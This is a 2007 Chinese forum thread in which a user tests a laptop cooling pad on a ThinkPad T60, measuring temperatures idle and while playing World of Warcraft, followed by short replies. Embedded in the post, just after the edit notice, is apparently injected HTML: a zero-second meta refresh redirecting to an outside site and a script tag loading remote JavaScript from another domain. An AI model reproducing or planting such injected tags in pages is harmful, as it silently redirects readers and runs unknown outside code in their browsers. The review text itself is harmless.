开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

来个新鲜的评测-----笔记本散热垫的评测

小弟自从用了小黑,那是倍加疼爱,天热怕他中暑,就弄了个笔记本散热垫。做了一个小小的评测,关于散热效果的。看看图片吧:

前三张是没用散热垫时候的温度:(3张分别是在什么程序都不开,魔兽世界5分钟后,还有魔兽世界刷了一次战场之后的截图!

这次使用的是mobmeter软件做的温度衡量

[ 本帖最后由 呵呵队长 于 2007-1-20 00:03 编辑 ]<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

什么程序都没开的时候

什么程序都没开的时候

5分钟wow之后

5分钟wow之后

一次战场之后的效果

一次战场之后的效果
非常抱歉的是
截图之后,编辑图片的时候,没有弄好……大意了……
第二张的温度是:61和62
第三张的温度是:60和61
使用散热垫之后的效果:
这次的图片和1楼的不一样,因为在做完不使用散热垫的截图后,就直接把散热垫插上了,然后先进行的wow评测,最后才是什么程序都不开时候的截图)

WOW5分钟之后的

WOW5分钟之后的

战场快刷完的时候

战场快刷完的时候

wow推出后的1分钟左右时截的

wow推出后的1分钟左右时截的
上边第二张图片的温度是60和61
对于测试,我要说的有以下几点:
1、测试不是非常准确,仅供分析。
2、由于wow游戏(魔兽世界),对于显卡的要求也比较高,我的电脑是T60的CC1学生机,内存1GB,CPU 1.83Ghz,显卡是X1300 64MB。使用中,感觉wow是不卡的,至少FPS应该是30以上的,分辨率是1280*800。之所以选择这款游戏,是由于可以把系统所有的硬件都在最高性能下运行,以造成最高温度。
3、在未使用散热垫作了测试之后,由于时间的原因,没有把电脑放凉,就直接作了后面的测试。所以使用散热垫的测试,先开始的是wow游戏的测试。

关于这次测试的结论:
1、在静态(即wow没有运行的情况下),使用散热垫之后的温度,会降低5度左右。
2、同是在wow游戏中,两者的温度没有什么大的差别。我想这是因为这款游戏的要求较高,所以系统发热高,使用散热垫的效果不是很明显。另外,系统本身的风扇,我想在两种情况下,转速也是不一样的,但是由于使用散热垫之后,有很大的散热垫风扇噪音,所以我不能说使用散热垫之后运行wow游戏,系统风扇比没有使用时的转速低。
3、在游戏运行结束后,由于有散热垫的风扇配合,所以系统整体温度下降很快,1分钟左右就下降了10度。

最后,这次评测的意义:
本来只是想看看散热垫对于本本有没有作用的,因为以前感觉使用散热垫之后的效果很是一般。通过这次评测,我觉得,使用散热垫还是很有意义的。主要的意义有2点:
1、使用散热垫增强了系统的稳定性
2、使用散热垫降低了本本自身风扇的转速,甚至停转也可以得。这就有利于本本自身风扇的保养,不易进入尘土,不易损坏!

最后,看一下我的散热垫图片:

散热垫

散热垫

没有使用时候的高度

没有使用时候的高度

使用后的高度

使用后的高度

侧面看时候后的高度

侧面看时候后的高度
呵呵 帮顶
太爽拉,羡慕lz
支持
好详细
LZ是好人啊 对小黑那么关照
bingling 该用户已被删除
其实这个散热垫也就是一般的说
还是coolmaster的好些
LZ的鼠标跟我的一样,呵呵。
字体挺大的,看着还算舒服。
太大了 不好
就是啊,太大了啊
夏天真得配一个,冬天还好吧
挺漂亮的
说实话 夏天的时候小黑还真是比较热
不太喜欢散热垫,一来小黑散热控制的还不错,二来加了这个东西老是觉得本本放的很难受。
设高亮了呵呵
不错的说。。夏天比较爽吧

冬天零下十度。。。得增热了~
本来小黑的散热就是一流的,不用底座了八
so good!写的不错。
bingling 该用户已被删除
这时间很长嘛?再过几个月就又是夏天咯